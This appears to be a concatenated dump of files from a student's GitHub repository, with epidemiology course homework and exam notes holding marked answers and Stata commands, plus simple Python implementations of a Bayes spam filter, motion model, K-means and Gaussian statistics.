"/PH207x/homework/nine/Coping and Outcomes after Surgery Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "## Coping and Outcomes after Surgery Study ##\n> Dr. Spencer is conducting a study to evaluate whether better coping styles are associated with improved outcomes after undergoing surgery. He is concerned that people with better coping styles have other healthy lifestyle factors and more social support that also impact post-surgery prognosis.\n\n#### 1. True or False: Because people cannot be randomized to a particular coping style, Dr. Spencer cannot test his hypothesis in a randomized controlled trial to assure that the correct counterfactual outcomes can be compared properly. Therefore, there is no way to evaluate this question.####\n* Yes\n* => **No**\n\n#### 2. Dr. Spencer chooses to draw a directed acyclic graph (DAG), which is useful because ####\n\n* It prevents confounding so that stratification is not necessary. \n* => **It helps the researcher evaluate the relationship between the factors under study to decide when stratification or statistical adjustment is appropriate.**\n* It addresses issues of chance and how that impacts the results of a stratified analysis.\n\n#### 3. True or False: In terms of examining whether there is a causal effect of exposure on outcome, Dr. Spencer wants to make sure that the risk of poor post-surgery prognosis is similar for all factors other than coping styles. This is important to achieve exchangeability to conclude that differences in coping styles is causing the differences in the risk of the outcome. ####\n* => **Yes**\n* No\n\n" }, { "alpha_fraction": 0.707733690738678, "alphanum_fraction": 0.7316147685050964, "avg_line_length": 56.45454406738281, "blob_id": "0c7443d7b15ddb1e1541ebb528a8d32afa7c559c", "content_id": "58d44f37243e9a8515a64486e139c33276b57233", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6323, "license_type": "no_license", "max_line_length": 802, "num_lines": 110, "path": "/PH207x/exam/exam_part2.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Prospective Cohort Study #\n> Please note: All students have different numbers in the tables below. Every student has a different exam. Make sure the answers that you submit correspond to your tables, or the answers will be marked incorrect. \n\nThe following tables show the crude and sex-specific results from a Prospective Cohort Study that examines the association between a binary exposure (E) and the development of a disease (D) during 20 years of follow-up. \n \nD - Development of a disease \nE - Binary exposure\n\n## Full Data: ##\n\n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 40 | 160 | 200 | 40/200=0.2\n E- | 20 | 180 | 200 | 20/200=0.1\n Total | 60 | 340 | 400 | \n\n## Sex-Specific Data: ##\n\n* **Males** \n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 8 | 32 | 40 | 8/40=0.2\n E- | 8 | 72 | 80 | 8/80=0.1\n Total | 16 | 104 | 120 | \n\n* **Females** \n | D+ | D- | Total | Estimated Risk\n------ | -- | --- | ----- | ---------------\n E+ | 32 | 128 | 160 | 32/160=0.2\n E- | 12 | 108 | 120 | 12/120=0.1\n Total | 44 | 236 | 280 | \n\n\n1. **Assume that this cohort is a simple random sample from a broader population of interest. Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution with probability of disease p^e+; and model the number of disease positive individuals among the unexposed in the sample using a binomial distribution, with probability of disease p^e-. Estimate p^e+, the proportion of exposed individuals who are disease positive, and provide an exact 95% confidence interval.** \n \n* Estimated Proportion:\n* Confidence Interval - Lower Bound:\n* Confidence Interval - Upper Bound:\n\nmean = n*p\nvariance = n*p*(1-p)\n\nExample: The proportion of people in the population with the disease (the prevalence) is 15%, then P(Y=1)=0.15 and P(Y=0)=0.85.\nIf we take a random sample of 5 people from this population, there will be 0,1,2,3,4, or 5 people with the disease.\nIf the probability of disease in each person is independent, then we can write down the probability of each of these outcomes even before we draw the sample.\n\n\n\n- Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution with probability of disease p^e+;\n- Model the number of disease positive individuals among the unexposed in the sample using a binomial distribution, with probability of disease p^e-\n- Estimate p^e+, the proportion of exposed individuals who are disease positive, and provide an exact 95% confidence interval.\n\n\n2. **Would you expect the large-sample Wilson confidence interval to provide similar results to the exact confidence intervals in question 1?**\n* Yes\n* No\n\n3. **Consider the following hypothetical scenario. Suppose that the data generating mechanism was different, and the data were generated from a stratified random sample of the population, where the probability of disease varies by stratum and the sampling probabilities vary by stratum. For instance, suppose the sampling was stratified by gender, where males were oversampled. Would the binomial model described in question 1 still be appropriate for estimating the proportion of diseased positive individuals in the population within exposure groups? (Model the number of disease positive individuals among all exposed individuals in the sample using the binomial distribution; and model the number of disease positive individuals among the unexposed in the sample using a binomial distribution).**\n* Yes\n* No\n\n\n4. **Now, we examine the risk difference between the exposed and unexposed populations. Estimate the risk difference for the disease and construct a corresponding large-sample 95% confidence interval. Calculate the risk difference as the proportion of diseased individuals in the exposed minus the proportion of diseased individuals in the unexposed.**\n \n* Risk Difference: \n* Confidence Interval - Lower Bound:\n* Confidence Interval - Upper Bound:\n\n5. **Conduct a two-sample proportion test that the risk difference is equal to zero (versus the alternative that the risk difference is not equal to zero) at the 0.05 level of significance.**\n* What is the absolute value of the test statistic?\n* What is the distribution of the test statistic under the null hypothesis?\n\t* Standard Normal \n\t* t-distribution \n\t* Binomial \n* What is the p-value?\n* What is your conclusion? (enter the letter of your best answer from the options listed below)\n\t* (A) We have evidence that the risk difference is not equal to 0.\n\t* (B) We do not have evidence that the risk difference is different from zero.\n\t* (C) None of the above.\n\n6. **Rather than testing that the risk difference is equal to 0 (as in question 5), could you have conducted a Pearson-chi square test to test for an association between disease and exposure?**\n* Yes\n* No\n\n\n7. **What is the value for the Crude Risk Ratio, comparing exposed subjects to non-exposed subjects?**\n\n\n8. **Using the Mantel-Haenszel formula, what is the value for the sex-adjusted Risk Ratio, comparing exposed subjects to non exposed subjects?**\n\n\n9. **Using the total data as a standard population, what is the value for the Standardized Risk Ratio?**\n\n\n10. **Is sex a confounder in this study? (enter the letter of your best answer from the options listed below)**\n* (A) Yes, because the crude RR equals the sex-adjusted RR\n* (B) No, because the crude RR equals the sex-adjusted RR\n* (C) Yes, because the crude RR does not equal the sex-adjusted RR\n* (D) No, because the crude RR does not equal the sex-adjusted RR\n* (E) Yes, because the RR among the males equals the RR among the females\n* (F) No, because the RR among the males equals the RR among the females\n\n\n11. **Using the Risk Ratio as a measure of association, is sex an effect modifier in this study?**\n* Yes, because the crude RR equals the sex-adjusted RR \n* No, because the crude RR equals the sex-adjusted RR \n* Yes, because the crude RR does not equal the sex-adjusted RR \n* No, because the crude RR does not equal the sex-adjusted RR \n* Yes, because the RR among males equals the RR among females \n* No, because the RR among males equals the RR among females \n\n\n" }, { "alpha_fraction": 0.7518247961997986, "alphanum_fraction": 0.7546322345733643, "avg_line_length": 52.90909194946289, "blob_id": "3d366f87260dd45164f4231e8c6aaa30c90f15cc", "content_id": "2b3d3070ae41a6201836776c2b2db24ac6804ce0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1781, "license_type": "no_license", "max_line_length": 384, "num_lines": 33, "path": "/PH207x/homework/eight/Alcohol Consumption and Cancer Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Alcohol Consumption and Cancer Study #\n> Dr. Marks is interested in examining the association between alcohol consumption and a rare form of cancer. Since it is hard to identify cases, Dr. Marks designs a case-control study. Cases are identified from cancer treatment centers across the United States. Controls are selected on the day that the case is diagnosed with cancer from among the relatives of the cancer patient. \n> \n> Good Link: http://www.ciphi.ca/hamilton/Content/content/resources/explore/fb_case_v_cohort.html\n\n#### 1. True or False: Dr. Marks should make sure to select the healthiest relative as the control to ensure that he will observe differences in risk between cases and controls. ####\n\n* True\n* False \n\n#### 2. The main concern of using relatives of cases as the controls is that #### \n\n* Some cases may not have relatives that drink alcohol. \n* NOPE: Some cases may have relatives that live far away so not all relatives will be available to participate. \n* Relatives of cases may be more likely to have levels of alcohol consumption that are more similar to the cases than the population that gave rise to the cancer cases. \n* NOPE: The controls may develop other diseases and will not be available to participate in this study. \n\n#### 3. Based on the study description above, Dr. Marks conducted a #### \n\n* Density case-control study \n* Nested case-control study \n* Case-cohort study \n* Retrospective cohort study \n\n#### 4. True or False: Using this design, a relative who served as a control cannot be included as a case if he later develops the cancer of interest. #### \n\n* True\n* False \n\n#### 5. True or False: Using the data collected in this study, Dr. Marks will be able to estimate the rates for developing this cancer. #### \n\n* True\n* False \n\n" }, { "alpha_fraction": 0.5186915993690491, "alphanum_fraction": 0.5887850522994995, "avg_line_length": 21.621212005615234, "blob_id": "68853642fb51557df76778f7591a524e3f9c97b0", "content_id": "a11baed527c38a039f1815ee59e89ad8229fad62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1498, "license_type": "no_license", "max_line_length": 146, "num_lines": 66, "path": "/PH207x/excercises/Lesson7/One Sample Binomial Model.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Categorical Data #\n\n## One Sample Binomial Model ##\n> p = probability of success \n> n = number of trials\n> mean = n*p \n> sd = sqrt( mean*(1-p) )\n> X = number of successess\n\n> We have to calculate the left probability!\n\n### Estimator of p ###\n> n trials, x successes= SUM i=1 to n d_i\n> where d_i = 1 if i_th trial is a success, \n> = 0 if i_th trial is a failure \n> \n> ^p= x/n= 1/n * SUM i=1 to n d_i\n\n\n## Inference for p ##\nIs approximately normal with mean p and standard deviation sqrt(p*(1-p)/n)\n\n### Standardization ###\n> Z = (^p - p) / sqrt(p*(1-p)/n)\n\n\n### Wald Estimator ###\n> Z = (^p - p) / sqrt(^p*(1-^p)/n)\n\n### Exact ###\nWe will do this later\n\n### Confidence Intervals (Wilson Methode) ###\n> So approximate CI, solve for ps that satisfy\n\n\tsumm death angina hospmi stroke cvd hyperten diabetes1\n\n## Hypothesis Testing for P ##\n\n> H_0: p=0.082 \n> n= 52 \n> p-value= 0.384\n> \n> Z= (^p - p) / sqrt(p*(1-p)/n) \n> = 0.115 - 0.082 / sqrt(0.082*(1-0.082)/52) \n \n> 6= 6 successes \n \n\tprtesti 52 6 0.082 , count\n\n### Exact test ###\n\n\tbintesti 52 6 0.082\n\n\n## Sample Size Estimation ##\n> Suppose we wish to test the hypothesis H_0: p <= 0.082 at the alpha=0.01 level, and we want power of 0.95 at p=0.2. How big a sample do we need?\n\n> For alpha=0.01 the z=2.32. So since \n> Z= (^p - p) / sqrt(p*(1-p)/n) \n> ^p= ? and n=? \n \n> a Z of 2.32 corresonds to a ^p of: \n> ^p = 0.082 + 2.32*sqrt(0.082*0.918/n)\n\n\tsampsi 0.082, alpha(0.01) power(0.95) onesamp oneside\n\n\n\n\n\n" }, { "alpha_fraction": 0.5809601545333862, "alphanum_fraction": 0.6615134477615356, "avg_line_length": 42.85714340209961, "blob_id": "fc4370d686a27d4667b43d155610d7f6ba721596", "content_id": "a38db7d40de35c7e0954b263724b35938bf50b92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1229, "license_type": "no_license", "max_line_length": 216, "num_lines": 28, "path": "/PH207x/homework/six/Nursing Home Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "#Nursing Home Study#\nSuppose that 500 residents of a large nursing home are screened for hypertension. All residents with above a specified level are labeled as having hypertension. The following table displays the results of this study.\n\nNursing Home Study Results\n | Hypertension | No Hypertension | Total | Risk \n------ | ------------ | --------------- | ------- | -------\nMale | 100 | 100 | 200 | 100/200\nFemale | 100 | 200 | 300 | 100/300\n\n\n1. Which of the following measures of association would be the most appropriate to use to describe the finding in this study? \n\n> Cumulative Ratio \n> Incidence Rate Ratio \n> => **Prevalence Ratio**\n\n2. What is the prevalence of hypertension among all residents? \n> prevalence of hypertension = (total number of people with hypertension)/(total number of people in study) \n> prevalence of hypertension = 200/500= 0.4\n\n3. What is the prevalence odds ratio for having hypertension comparing male residents (exposed group) to female residents (non-exposed group)?\n> Prevalence odds= prev/1-prev \n> R1= 100/200= 0.5 \n> R2= 100/300= 0.33333333 \n> R1/(1-R1)= 1 \n> R2/(1-R2)= 0.49999999 \n\n> => R1/R2= 1/0.49999999= **2**\n\n" }, { "alpha_fraction": 0.6100082993507385, "alphanum_fraction": 0.6476426720619202, "avg_line_length": 40.60344696044922, "blob_id": "341a126db333b879183dfa8cdc64d0c9107751c0", "content_id": "599b8feacf80ed1481e02f325842610069cca863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2418, "license_type": "no_license", "max_line_length": 209, "num_lines": 58, "path": "/PH207x/homework/seven/Contingency Tables.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Contingency Tables #\n> Continue using the Fergusson et al. (2012) clinical trial data to complete the following questions. Again, use either the dataset from the previous question, hw7.dta, or the study results in the table below.\n\nOutcome | Standard Protocol | Fresh Blood\n--------------------------- | ----------------- | ------------\nNecrotizing enterocolitis | 15 | 15\nIntraventricular hemorrhae | 11 | 18\nRetinopathy of prematurity | 26 | 23\nBronchopulmonary dysplasia | 63 | 60\nDeath | 31 | 30\nComposite Outcome | 100 | 99\nTotal Sample Size | 189 | 188\n\n#### 1. Estimate the odds ratio and a 95% confidence interval for experiencing the composite outcome for those in the fresh blood group versus standard protocol blood group. #### \n> **Hint1:** exposed = fresh blood unexposed = standard protocol \n> **Hint2:** composite outcome not composite outcome (all the other entries)\n\n> OR Estimate: **0.99**\n\n> 95% Confidence Interval: **[0.6607011,1.483424 ]**\n\n\n> I used: \n\n\tcs fresh outcome, or woolf\n\n\n\n##### Is there evidence of an association between blood group and the composite outcome (at the 0.05 level of significance). ##### \n> Yes \n> => **No** \n\n\ttabulate outcome fresh, expected chi2\n\n\n#### 2. Construct a 2x2 table for the composite outcome versus blood group. Are the expected cell counts large enough to conduct a Pearson Chi-square test? #### \n\n\ttabplot outcome fresh\n\n#### 3. Using the Pearson chi-square test, determine if there is evidence of an association between blood group and the composite outcome at the level of significance. #### \n> (To answer this question, either use the hw7.dta dataset OR explore using the csi command by typing \"db csi.\") \n\n\ttabulate outcome fresh, expected\n\tcsi 100 99 98 98, or woolf\n\n##### What is the value of the test statistic? Round your answer to two decimal places. ######\n> chi2(1) = **0.00**\n\n##### What is the null distribution of the test statistic? ##### \n> => **Chi-square distribution with 1 degree of freedom**\n> Binomial distribution\n\n##### What is the p-value? ##### \n> Pr>chi2 = **0.9602**\n\n##### What is the conclusion? #####\n> => **No evidence of an association between fresh and standard groups**\n> Evidence of an association between fresh and standard groups \n\n\n\n\n" }, { "alpha_fraction": 0.7340877056121826, "alphanum_fraction": 0.7355021238327026, "avg_line_length": 31.090909957885742, "blob_id": "f1acf8446e7f4dd5cd304a4c646fd51f44b4be1a", "content_id": "23c2454fbc3378ed461ad26a0c1e062beee0fc27", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 707, "license_type": "no_license", "max_line_length": 109, "num_lines": 22, "path": "/AI-Class/Algorithms-Python/BayesFilter/tests.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "from BayesFilter import BayesFilter\n\n## Example data taken from Stanford AI video class (Unit 5 Machine Learning)\n## http://www.ai-class.org\n\nfilter = BayesFilter()\n\n## Add some messages we flagged as spam\nfilter.addDoc(\"offer is secret\", \"spam\")\nfilter.addDoc(\"click secret link\", \"spam\")\nfilter.addDoc(\"secret sports link\", \"spam\")\n\n## Add some messages we did not flag\nfilter.addDoc(\"play sports today\", None)\nfilter.addDoc(\"went play sports\", None)\nfilter.addDoc(\"secret sports event\", None)\nfilter.addDoc(\"sports is today\", None)\nfilter.addDoc(\"sports costs money\", None)\n\nfilter.db.info()\n\nprint \"Probability of spam, given message 'today is secret' = %s\" % filter.predict(\"spam\", \"today is secret\")\n\n" }, { "alpha_fraction": 0.5666199326515198, "alphanum_fraction": 0.5862552523612976, "avg_line_length": 27.625, "blob_id": "92a1a054fc10dac4518e9150cf679ef8e1c57fd0", "content_id": "036f9c18e94327be49e81dbb69fb92d7d6b5de8b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 68, "num_lines": 24, "path": "/AI-Class/Algorithms-Python/MotionModel.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "import math\r\n\r\nclass MotionModel(object):\r\n\tdef __init__(self, x0=0, y0=0, theta0=0, v=0, w=0):\r\n\t\tself.x = float(x0)\r\n\t\tself.y = float(y0)\r\n\t\tself.theta = float(theta0)\r\n\t\tself.v = float(v)\r\n\t\tself.w = float(w)\r\n\r\n\tdef __str__(self):\r\n\t\treturn 'x=%.4f, y=%.4f, theta=%.4f' % (self.x, self.y, self.theta)\r\n\r\n\tdef move(self, delta_t):\r\n\t\tnew_x = self.x + self.v * delta_t * math.cos(self.theta)\r\n\t\tnew_y = self.y + self.v * delta_t * math.sin(self.theta)\r\n\t\tnew_theta = self.theta + self.w * delta_t\r\n\r\n\t\tself.x, self.y, self.theta = new_x, new_y, new_theta\r\n\r\n\tdef move_times(self, delta_t, times):\r\n\t\tfor i in xrange(times):\r\n\t\t\tself.move(delta_t)\r\n\t\t\tprint \"time=%d, pos=%s\" % (delta_t+i*delta_t, str(self))\r\n\r\n" }, { "alpha_fraction": 0.7798036336898804, "alphanum_fraction": 0.7812061905860901, "avg_line_length": 100.42857360839844, "blob_id": "af6464435d25e7440325010be2aef9123ed69b60", "content_id": "0796d952dab5fb779fbe9ef3f982a4c0e1f8828d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 713, "license_type": "no_license", "max_line_length": 257, "num_lines": 7, "path": "/PH207x/homework/seven/Randomized Clinical Trial versus Cohort Study.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Randomized Clinical Trial versus Cohort Study #\n> The benefit of a randomized clinical trial over an observational cohort study is that, in large enough samples, the groups are identical with respect to \n> **Hint1:** A prospective cohort study is a cohort study that follows over time a group of similar individuals (cohorts) who differ with respect to certain factors under study, to determine how these factors affect rates of a certain outcome. (wikipedia) \n> \n> => **Other extraneous factors that are associated with the outcome of interest** \n> Factors that would make the results more generalizable to the larger population \n> Other factors related to the likelihood of participating in a study \n\n\n" }, { "alpha_fraction": 0.5538336038589478, "alphanum_fraction": 0.5866231918334961, "avg_line_length": 22.520000457763672, "blob_id": "c88f576343f2bafb44c02f9b344c0382c95894e7", "content_id": "c25e4ed87dcd96492b5e818ef8e5d45117c39e4e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6130, "license_type": "no_license", "max_line_length": 97, "num_lines": 250, "path": "/AI-Class/Algorithms-Python/KMeans.py", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "from math import pow\r\nfrom math import sqrt\r\nfrom math import exp\r\nfrom math import pi\r\nimport random\r\n\r\ntau = (2 * pi)\r\n\r\nclass KMeans:\r\n\t\"\"\"\r\n\tAttempt to implement the KMeans algorithm\r\n\tas described in Unit 6 of the AI class.\r\n\t\"\"\"\r\n\r\n\tdef __init__(self,k,data,max_guess=(100,100),min_guess=(-100,-100)):\r\n\t\t\"\"\"\r\n\t\tConstruct a K-means with the given parameters.\r\n\r\n\t\t'max_guess' and 'min_guess' control the range of values\r\n\t\tused when generating random cluster centers; the author\r\n\t\thas not thought very hard about a way to generate values\r\n\t\tthat are always guaranteed to work no matter what data we\r\n\t\thave.\r\n\t\t\"\"\"\r\n\t\tself.k = k\r\n\t\tself.data = data\r\n\t\tself.max_guess = max_guess\r\n\t\tself.min_guess = min_guess\r\n\r\n\tdef rand_cluster_center(self):\r\n\t\tx = random.uniform(self.min_guess[0],self.max_guess[0])\r\n\t\ty = random.uniform(self.min_guess[1],self.max_guess[1])\r\n\t\treturn x, y\r\n\r\n\tdef dist(self, a, b):\r\n\t\tax, ay = a[1], a[2]\r\n\t\tbx, by = b[1], b[2]\r\n\t\treturn sqrt( pow(by-ay,2)+pow(bx-ax,2) )\r\n\r\n\tdef centers(self):\r\n\t\tcenters = []\r\n\t\tfor i in xrange(self.k):\r\n\t\t\trc = self.rand_cluster_center()\r\n\t\t\tcenters.append([i, rc[0], rc[1]])\r\n\t\treturn centers\r\n\r\n\tdef closest_center(self, centers, datum):\r\n\t\t\tclosest = None\r\n\t\t\tclosest_d = None\r\n\t\t\tfor c in centers:\r\n\t\t\t\td = self.dist(c, datum)\r\n\t\t\t\tif closest is None or d < closest_d:\r\n\t\t\t\t\tclosest = c\r\n\t\t\t\t\tclosest_d = d\r\n\t\t\treturn (closest, closest_d)\r\n\t\r\n\tdef mean(self, data_points):\r\n\t\tn = float(len(data_points))\r\n\t\tmean_x = sum( [dp[1] for dp in data_points] ) / n\r\n\t\tmean_y = sum( [dp[2] for dp in data_points] ) / n\r\n\t\treturn (mean_x, mean_y)\r\n\r\n\tdef kmeans(self,initial_centers=None,tolerance=0):\r\n\t\t\"\"\" Run the K-means algorithm to convergence \r\n\t\t\t(or until the difference in an old and new cluster\r\n\t\t\tcenter in one iteration is <= tolerance)\r\n\t\t\"\"\"\r\n\t\tcenters = initial_centers \\\r\n\t\t\t\tif initial_centers is not None else self.centers()\r\n\t\t\r\n\t\titerations = 0\r\n\t\twhile True:\r\n\t\t\titerations = iterations + 1\r\n\t\t\tclusters = dict([(i,[]) for i in xrange(self.k)])\r\n\t\t\tfor a in self.data:\r\n\t\t\t\tcc = self.closest_center(centers, a)\r\n\t\t\t\tcenter = cc[0]\r\n\t\t\t\tlabel = center[0]\r\n\t\t\t\tclusters[label].append(a)\r\n\r\n\t\t\tfor label, data_points in clusters.iteritems():\r\n\t\t\t\tif not data_points:\r\n\t\t\t\t\tcenters = self.centers()\r\n\t\t\t\t\tbreak # restart at random\r\n\r\n\t\t\t\tcenter = centers[label]\r\n\t\t\t\told_center_x, old_center_y = center[1], center[2]\r\n\t\t\t\tnew_center_x, new_center_y = self.mean(data_points)\r\n\r\n\t\t\t\tif abs(new_center_x - old_center_x) <= tolerance \\\r\n\t\t\t\t\t\tand abs(new_center_y - old_center_y) <= tolerance:\r\n\t\t\t\t\t# converged\r\n\t\t\t\t\treturn {\r\n\t\t\t\t\t\t\t'iterations' : iterations,\r\n\t\t\t\t\t\t\t'clusters' : clusters, \\\r\n\t\t\t\t\t\t\t'centers' : centers }\r\n\r\n\t\t\t\t# update center to mean\r\n\t\t\t\tcenter[1] = new_center_x\r\n\t\t\t\tcenter[2] = new_center_y\r\n\r\ndef mean(v,M):\r\n\treturn sum( v ) / float(M)\r\n\r\ndef variance(v,u):\r\n\treturn mean( ( (pow((x - u),2) for x in v)), len(v) )\r\n\r\ndef transpose(v, dims):\r\n\t\"Swap rows and columns\"\r\n\r\n\tnumRows = len(v)\r\n\tt = dims*[None] \r\n\tfor i in range(dims):\r\n\t\tt[i] = numRows* [None]\r\n\t\tfor j in range(numRows):\r\n\t\t\tt[i][j] = v[j][i]\r\n\treturn t\r\n\r\ndef matrixMultiply(a, colsA, b, colsB):\r\n\t\"\"\"Multiply to matrices\r\n\t\r\n\t\tVery basic and inefficient implementation; \r\n\t\tnothing near the sophistication of Strassen's algorithm \r\n\t\tis used.\"\"\"\r\n\trowsA = len(a)\r\n\trowsB = len(b)\r\n\r\n\t# rowsA x colsA ... rowsB x colsB \r\n\tassert rowsA == colsB, \"matrix dimensions not fit for multiplication\"\r\n\r\n\t# result size: rowsA x colsB\r\n\tr = rowsA * [None]\r\n\tfor i in range(rowsA):\r\n\t\tr[i] = colsB * [None]\r\n\t\tfor j in range(colsB):\r\n\t\t\t\tr[i][j] = sum( a[i][k]* b[k][j] for k in range(colsA))\r\n\treturn r\r\n\r\ndef scalarMultiply(a, cols, x):\r\n\t\"\"\" Multiplies the matrix a by the scalar x.\"\"\"\r\n\tr = len(a) * [None]\r\n\tfor i in range(len(a)):\r\n\t\tr[i] = cols * [None]\r\n\t\tfor j in range(cols):\r\n\t\t\tr[i][j] = a[i][j] * x\r\n\treturn r\r\n\t\r\n\r\ndef subtractRows(a, colsA, b):\r\n\t\"\"\" Subtract the tuple b from each row of matrix a. The length of b must be the dimentions of a.\r\n\t\r\n\tEx.:\r\n\t3 8 -2 3\r\n\t4 7 - 5 5 = -1 2\r\n\t5 5 0 0\r\n\t\"\"\"\r\n\tassert colsA == len(b), \"incompatible dimensions for subtractRows\"\r\n\tr = len(a)*[None]\r\n\tfor i in range(len(a)):\r\n\t\tr[i] = colsA * [None]\r\n\t\tfor j in range(colsA):\r\n\t\t\tr[i][j] = a[i][j] - b[j]\r\n\treturn r\r\n\r\ndef printMatrix(a):\r\n\tbuf = []\r\n\tfmt = \"%5s\"\r\n\tfor x in a:\r\n\t\tbuf.append('[')\r\n\t\tfor y in x:\r\n\t\t\tbuf.append(fmt % str(y))\r\n\t\tbuf.append(']\\n')\r\n\tprint ''.join(buf)\r\n\r\n\r\n\r\nclass Gauss:\r\n\t\"\"\"\r\n\tGaussian distribution for input vector v:\r\n\r\n\tmean = 1/ M sum( Xi )\r\n\tvariance = 1 / M * sum( (Xi - mean)^2 )\r\n\r\n\t>>> Gauss([3,4,5,6,7]).mean()\r\n\t5.0\r\n\t\r\n\t>>> Gauss([3,4,5,6,7]).variance()\r\n\t2.0\r\n\r\n\t>>> Gauss([3,4,5,6,7]).p(3.456)\r\n\t0.1848502338825046\r\n\t\"\"\"\r\n\r\n\tdef __init__(s, v=None):\r\n\t\ts.v = v if v is not None else [1]\r\n\r\n\tdef mean(s):\r\n\t\treturn mean( (x for x in s.v), len(s.v))\r\n\r\n\tdef variance(s):\r\n\t\treturn variance(s.v, s.mean())\r\n\r\n\tdef p(s, x):\r\n\t\tmu = s.mean()\r\n\t\tsigma2 = s.variance()\r\n\t\tsigma = sqrt(sigma2)\r\n\t\treturn 1/sqrt( tau * sigma ) * exp( -.5 * pow(x - mu, 2) / sigma2 )\r\n\r\nclass MultiGauss:\r\n\t\"\"\"\r\n\tMultiGauss(2, [(1,2),(3,4),(5,6)])\r\n\r\n\tSpecifiy dimensions and then vector of tuples.\r\n\r\n\tExample:\r\n\t>>> MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]]).variances()\r\n\t[[2.0, -3.2000000000000002], [-3.2000000000000002, 5.2000000000000002]]\r\n\r\n\t>>> MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]]).means()\r\n\t(5.0, 5.0)\r\n\t\"\"\"\r\n\tdef __init__(s, dims, v):\r\n\t\ts.dims = dims\r\n\t\ts.v = v\r\n\r\n\tdef means(s):\r\n\t\t\"Returns the mean of each dimenion as a tuple\"\r\n\t\treturn [ mean( (x[i] for x in s.v), len(s.v) ) for i in range(s.dims)]\r\n\r\n\tdef variances(s):\r\n\t\tmeans = s.means()\r\n\t\txMinusU = subtractRows(s.v, s.dims, means)\r\n\t\txMinusU_T = transpose(xMinusU, s.dims)\r\n\t\tr = matrixMultiply(xMinusU_T, len(s.v), xMinusU, s.dims)\r\n\t\treturn scalarMultiply(r, s.dims, 1/float(len(s.v)))\r\n\r\n\r\ndef testIt():\r\n\tmg = MultiGauss(2, [[3,8],[4,7],[5,5],[6,3],[7,2]])\r\n\r\n\tprint \"data:\"\r\n\tprintMatrix(mg.v)\r\n\r\n\tprint \"means:\"\r\n\tprintMatrix([mg.means()])\r\n\r\n\tprint \"variances:\"\r\n\tprintMatrix(mg.variances())\r\n\r\ntestIt()\r\n" }, { "alpha_fraction": 0.6624161005020142, "alphanum_fraction": 0.7288590669631958, "avg_line_length": 58.599998474121094, "blob_id": "7c0b828fdd14b7d283c3b9d9820e264a3b45a36d", "content_id": "55b66fbff87e9b9e32d9c06aa63f5f3f9daf0d83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1490, "license_type": "no_license", "max_line_length": 310, "num_lines": 25, "path": "/PH207x/excercises/step by step guidance for PPV and NPV.md", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "# Step by step guidance for PPV and NPV\n\n## Pre Test\nPretest: Prevalence is 16.1%. Which means out of 100 people, 16.1 people have disease. That means 100 - 16.1 do not have the disease.\n\n## Post Test\n1. When the test is carried out, ideally all 16.1 should test positive, But the sensitivity being 0.721, out of 16.1, only (16.1 * 0.721) test positive. Remaining test -ve inspite of having disease. So 16.1 - (16.1 * 0.721) is the number of cases who have disease and yet have tested negative (False Negative).\n\n2. So the proportion who test FN is = Number tested False Negative in Step 2 / Total No of patients with disease (16.1). This will give you your FN rate.\n\n3. Now from Step 1 we know how many people do not have disease. This is the number which should ideally test -ve if the specificity was 100% i.e. 1. But since specificity is only 0.932, only (100 - 16.1) * 0.932 test -ve.\n\n4. This means ((100 - 16.1) - (100 - 16.1) * 0.932) test positive inspite of not having a disease. These are your False Positive Cases.\n\n5. So now calculate the FP rate similar to how we calculated FN rate.\n\n6. Now you have your FN and FP rates. Be happy.\n\n7. Now your PPV is TRUE POSITIVE / TOTAL POSITIVE. Here true positive is the value you got in Step 2 (16.1* sensitivity)). And Total Positives is this value plus FP you got in step 5.\n\n8. Similarly your NPV is True Negative / Total Negative values.\n\n9. Use the formula 1-PPV and 1-NPV.\n\n10. If you get all correct, you must wear a big smile!\n" }, { "alpha_fraction": 0.7340339422225952, "alphanum_fraction": 0.7409054040908813, "avg_line_length": 61.38461685180664, "blob_id": "6f95fedd8524475721e539d862b32b3a1ad1d2ea", "content_id": "5516694902e1216cd58a8bffe90ae27d13a534cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 2474, "license_type": "no_license", "max_line_length": 282, "num_lines": 39, "path": "/AI-Class/Algorithms-Python/README.txt", "repo_name": "erichilarysmithsr/Machine-Learning", "src_encoding": "UTF-8", "text": "This README file is a duplicate of the following aiqus.com 